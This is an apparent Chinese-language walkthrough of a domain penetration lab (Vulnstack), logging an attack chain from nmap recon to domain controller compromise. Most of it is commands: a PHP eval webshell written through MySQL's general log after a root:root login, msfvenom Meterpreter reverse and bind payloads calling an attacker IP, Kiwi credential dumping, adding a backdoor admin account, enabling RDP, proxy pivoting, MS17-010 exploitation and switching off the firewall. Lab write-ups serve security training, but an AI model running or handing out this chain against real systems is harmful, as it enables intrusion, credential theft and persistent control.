
┌──(root💀kali)-[/]
└─# nmap -A 192.168.164.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CST
Nmap scan report for 192.168.164.128
Host is up (0.00052s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1030/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a7:c1:b2 (VMware)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name: god.org
| Forest name: god.org
| FQDN: stu1.god.org
|_ System time: 2021-07-26T09:55:13+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-26T01:55:13
|_ start_date: 2021-07-26T01:43:45
TRACEROUTE
HOP RTT ADDRESS
1 0.51 ms 192.168.164.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.47 seconds

└─dirsearch -u http://192.168.164.128



5. 本來想着找個python腳本爆破一下,可惜網上的大多用不了,手動猜出來了root:root,登陸進去之后就是通過phpmyadmin寫入webshell了
我們這里用日志寫入一句話的方式,首先進入phpmyadmin后台,查看genelog變量,更改general log和general log file參數,初始設置general log是OFF,我們將其改成ON;general log file改成網站的根目錄,通過phpstudy指針已經知道了網站根目錄
show global variables like '%general%';

set global general_log='on';

set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';


這邊寫入大馬意識可以的:
select '<?php eval($_POST["shell"]);?>';



7. 查看根目錄之后發現了一個cms,我們在瀏覽器訪問,自己安裝的phpstudy打不開這個管理系統,把原來的phpstudy重啟一下完美解決
不用掃目錄之類的了,主頁面已經給了出來信息直接用,進入后台並登錄




10. 看了一下教程,說是留言板有個xss的,我們也來試試
<script>alert('xss')</script>


msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.164.129
set lport 1222


13. 加載Kiwl插件獲取hash並解密
ps:
migrate PID(進程遷移)這邊meterpreter是32位的,系統是64位的,所以得遷移進程
meterpreter > load Kiwi
meterpreter > creds_all


net user test Admin123 /add # 添加賬戶密碼
net localgroup administrators test /add # 給test賬戶添加為管理員權限
net user test # 查詢是否成功添加test用戶
run post/windows/manage/enable_rdp

rdesktop 192.168.164.128:3389 kali的一個遠程工具


15. 開始橫向移動,先自動創建路由
run post/multi/manage/autoroute






proxychains nmap -sT -Pn 192.168.52.143


use auxiliary/scanner/netbios/nbname

22. 再用msf的端口掃描模塊對發現的主機掃描,查看開放的端口,這邊雙管齊下,掃描的太慢了
use auxiliary/scanner/portscan/tcp

use auxiliary/scanner/smb/smb_ms17_010


use auxiliary/admin/smb/ms17_010_command

net config workstation 查看是否有域,以及當前登錄域

C:\Windows\system32>chcp 65001
net view 查看域內主機列表



net user /domain 查看域內所有域用戶

net group "domain admins" /domain 查看域管理員列表

26. 完全可以用ms17_010command模塊來執行命令,打開3389添加用戶,登陸進去,其實在win7上就拿到了管理員用戶名和密碼,不過這是練習,我們就在繼續騷操作
我們通過彈一個正向shell (因為msf 開了代理,所以不能彈反向shell),我們可以win7遠程桌面,所給把馬子傳給win7然后開共享目錄,下載到域控上面,然后執行
msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe

use exploit/multi/handler



copy \\192.168.52.143\WWW\s.exe C:\s.exe


set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe


set payload windows/x64/meterpreter/bind_tcp

set payload windows/meterpreter/bind_tcp

exploit/windows/smb/ms17_010_eternalblue





這里還有一點對於非服務器版本的windows 遠程登錄的話,會斷開該主機當前的連接,有可能會驚動管理員。這個時候不慌,可以使用rdpwrap。
rdpwrap是一款可以允許非服務器版本進行多個用戶登錄的patcher,從github上面下載下來,用蟻劍把 RDPWInst.exe 傳上去,然后執行:
RDPWInst.exe -i -s
總結:
1.通過NMAP對目標網絡段進行存活主機探測,通過排查發現目標主機128有可利用點
nmap -sp 192.168.164.0/24
2.對128主機進行端口探測,發現是該主機是域成員主機以及開放了80,445,3306端口
nmap -A 192.168.164.128
3.通過dirsearch對192.168.164.128的web應用進行URL目錄掃描,發現存在phpmyadmin目錄和l.php
4.訪問1.php,發現網站的根目錄為:C:/phpStudy/PHPTutorial/WWW/
5.訪問phpmyadmin目錄,是網站的數據庫管理系統,這里通過嘗試輸入弱口令root/root即可登錄系統
6.在sql語句中執行命令查看general變量,發現general log是OFF,並且發現general log file的根目錄是C:/phpStudy/PHPTutorial/MYsql/
show global variables like '%general%';
7.將general log設置為on
set global general_log='on';
8.將 general log file設置為網站根目錄
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
9.通過log日志寫入一句話
select '<?php eval($_POST["shell"]);?>';
10.通過蟻劍成功連接一句,並通過自帶的命令功能查看下當前目標權限為admin權限
whomai
12.發現目標系統中的根目錄下還有一個CMS目錄,訪問CMS目錄,公告直接泄露了網站后台的用戶名和密碼,可成功登陸到系統后台
13.在后台模板處可直接上傳php大馬,大馬名稱為shell_1.php
14.通過robots.txt查看到泄露的目錄,訪問目錄,可目錄遍歷到上傳到大馬的目錄保存路徑
http://192.168.164.128/yycms/protected/apps/default/view/default
15.可成功訪問php大馬
http://192.168.164.128/yycms/protected/apps/default/view/default/shell_1.php
16.在攻擊機上執行MSF生成的后門
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
17.通過蟻劍將asd.exe上傳到目標系統中,並通過其命令功能執行
c:/>acd.exe
18.MSF進行監聽,成功上線
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.164.129
set lport 1222
19.通過smart_hasdump模塊獲取目標的hash值,可成功獲取到管理員的hash
meterpreter>run post /windows/gather/smart_hashdump
20.加載kiwi插件獲取hash並解密
meterpreter > load Kiwi
meterpreter > creds_all
21.通過注冊表開啟3389端口,添加遠程桌面用戶,進入遠程桌面
meterprter>shell
c:/>ipconfig //查看到目標系統存在兩個網卡,一個網卡IP地址為192.168.164.128,另外一個網卡IP地址為192.168.52.143
c:/>net user test Admin123 /add # 添加賬戶密碼
c:/>net localgroup administrators test /add # 給test賬戶添加為管理員權限
c:/>net user test # 查詢是否成功添加test用戶
rdesktop 192.168.164.128:3389 //kali下進行遠程桌面
22.開始橫向移動,先自動創建路由
meterprter>run post/multi/manage/autoroute
23.掛起會話,通過post/multi/manage/autoroute查看路由表
meterprter>background
msf>use post/multi/manage/autoroute
msf>set session 1
msf>route print
msf>run
24.使用auxiliary/server/socks_proxy這個模塊開進行socks代理,設置好服務器ip和端口,運行后自動掛入后台
msf>use auxiliary/server/socks_proxy
msf>set srvhost 127.0.0.1
msf>run
25.修改/etc/proxychains.conf文件
sokcs5 127.0.0.1 1080
26.查看socks5端口
netstat -an |grep 1080
27. 這里使用msf自帶的模塊來掃描,發現了兩台存活的主機(192.168.52.138與192.168.52.141)
use auxiliary/scanner/netbios/nbname
28.通過proxychains加載nmap進行掃描另一個網卡IP 192.168.52.141端口,發現也開放了80,335,3306,445端口
proxychains nmap -sT -Pn 192.168.52.141
29.再用msf的端口掃描模塊對發現的主機掃描,查看開放的端口,發現192.168.52.138端口開放了21,445等端口
use auxiliary/scanner/portscan/tcp
30.都開了445端口經典ms17_010利用起來,先掃描發現有ms17_010的漏洞
use auxiliary/scanner/smb/smb_ms17_010
31. 使用ms17_010的command模塊可以執行指令
use auxiliary/admin/smb/ms17_010_command
32.查看目標系統信息
msf>sessions -i 2
meterprter>shell
c:/>net config workstation //查看是否有域,查看當前域情況
c:>chcp 65001 //解決中文亂碼
c:/>net view //查看當前域主機列表
c:/>net group "domain controllers" /domain //查看域控制器
c:/>ping owa 查看計算機名對應的IP地址
c:/>net user /domain 查看域內用戶
c:/>net group "domain admins" /domain 查看域管理員列表
33.通過彈一個正向shell (因為msf 開了代理,所以不能彈反向shell),我們可以win7(192.168.52.143)遠程桌面,所給把馬子傳給win7然后開共享目錄,下載到域控上面,然后執行
msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe
34.MSF進行監聽
use exploit/multi/handler
set payload windows/meterprter/bind_tcp
set lhost 192.168.164.129
set lport 3333
run
35.遠程桌面上win7(192.168.52.143)開啟共享
36.在域控主機上下載s.exe
copy \\192.168.52.143\WWW\s.exe C:\s.exe //發現下載不了,估計是win7防火牆開了
37.查看放防火牆狀態:
netsh advfirewall show allprofile state
38.關閉所有防火牆:
netsh advfirewall set allprofiles state off
39.再試試下載文件,不能下載,我們用其他方法
set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe
下載地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/